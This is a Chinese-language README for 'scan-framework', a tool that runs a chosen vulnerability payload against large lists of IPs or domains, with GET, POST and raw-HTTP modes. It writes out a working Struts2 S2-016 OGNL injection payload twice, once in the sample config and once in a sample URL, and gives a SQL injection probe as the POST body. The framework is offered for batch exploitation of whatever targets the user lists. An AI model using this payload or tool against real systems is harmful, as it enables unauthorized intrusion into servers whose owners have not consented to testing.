scan-framework
scan-framework是一个漏洞批量利用扫描框架,只需要进行简单配置,就可以变成一个任意漏洞批量利用的工具,前提是你必须有漏洞的payload、扫描的IP或者域名列表。
你可以使用 scan-framework:
- 进行GET方法的形式的漏洞批量扫描
- 进行POST方法的形式的漏洞批量扫描
- 进行Http原始报文的漏洞批量扫描
使用步骤
- 确保收集一个有效的漏洞探测payload
- 有一个待扫描的IP或者域名列表
- 触发漏洞的页面中有代表漏洞探测成功的特征字符串
- 会使用scan-framework的配置文件
- 入口文件为cli.py 命令行参数-m
配置文件
配置文件位于工程中的conf文件夹下:
[main]
# 扫描为真的规则(支持正则)
scan_rule = hacker
# 扫描后收集结果的规则(支持正则)
res_rule = hacker
# 扫描使用的payload
payload = redirect:${%23p%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23p.println(%22hacker%22),%23p.close()}
# 使用raw方法,放置http报文的文件
raw_file =
# 待扫描ip列表的文件
ip_file = c:\\ip.txt
#输出结果的文件
out_file = c:\\res.txt
# 开启的线程数
thread_num = 8
# 请求的方式
method = get
上面是一个典型的get方法的漏洞扫描的配置,其中特征字符串尾hacker,扫描中可以根据scan_rule判断是否存在漏洞,使用res_rule获取漏洞触发页面上的一些信息,这个两个选项支持正则匹配,你可以写入判断依据的正则表达式,scan-framework会使用它们进行爬取。
##两种扫描方式 url模式下,可以扫描如下形式的漏洞,比如S2-016漏洞:
http://127.0.0.1:8080/struts_hello/hello?redirect:${%23p%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23p.println(%22hacker%22),%23p.close()}
如果网站有漏洞,那么在页面上会显示出hacker字符串,只需要配置:
scan_rule = hacker
上面是一种get方式的漏洞扫描。 当method = post时,payload为POST数据包中请求体,如:
username=admin' and 1=1&password=xxss&login=1
raw模式下,要求配置文件中raw_file不为空,而是指定一个保存http请求报文的文件,文件中可能是下面的形式:
GET /code/test.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://127.0.0.1/code/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=bv2n8m904ggt8nsi9istnm9fg7
##命令行参数
>python cli.py -h
Usage: cli.py [options]
Options:
-h, --help show this help message and exit
-m MODE, --mode=MODE
选择相应的模式:
- -m url 对应URL模式
- -m raw 对应RAW模式
##Bug反馈 请联系: [email protected]